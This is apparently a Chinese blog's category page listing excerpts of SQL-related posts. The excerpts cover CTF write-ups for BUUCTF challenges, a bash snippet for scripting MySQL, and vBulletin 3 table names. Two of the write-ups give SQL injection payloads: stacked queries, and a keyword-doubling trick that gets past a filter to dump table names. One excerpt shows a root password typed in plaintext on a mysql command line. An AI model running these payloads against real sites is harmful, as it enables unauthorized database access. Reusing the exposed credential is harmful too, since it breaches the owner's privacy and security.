
sql
偷一个月亮
爱搞事的web狗~
展开
-
2019强网杯 随便注 堆叠注入
堆叠注入未过滤 alert rename show正则匹配过滤掉了经常使用的查询关键字,但是并没有禁用show,那么可以试下堆叠查询。?inject=0'; show databases;%23http://874c5b38-9383-4b54-959f-22876b22bb0c.node3.buuoj.cn/?inject=-1'; show databases; %23http://874c5b38-9383-4b54-959f-22876b22bb0...原创 2020-09-01 11:13:54 · 272 阅读 · 0 评论 -
[极客大挑战 2019]BabySQL 1 详细题解
过滤 select or and union fromhttp://6d3700e3-2a8a-4291-9f0b-67e729cae0a1.node3.buuoj.cn/check.php?username=1' ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=datab...原创 2020-09-01 09:51:03 · 6514 阅读 · 2 评论 -
极客大挑战 lovesql
原创 2020-09-01 09:29:01 · 174 阅读 · 0 评论 -
使用脚本操作mysql数据库 -- Linux bash
使用脚本操作mysql数据库非交互执行sql语句ubuntu@VM-0-13-ubuntu:~$ mysql -uroot -pwen1053431697 -e "show databases"mysql: [Warning] Using a password on the command line interface can be insecure.+------------------...原创 2020-01-10 10:49:47 · 272 阅读 · 0 评论 -
vbulletin3数据库信息
vbulletin3数据库中比较重要的表adminlog、editlog、post、session、thread、useradminlogadminlogid,userid,dateline,script,action,extrainfo,ipaddresseditlogpostid,userid,username,dateline,reasonpostpostid,thread...原创 2019-11-23 09:44:45 · 486 阅读 · 0 评论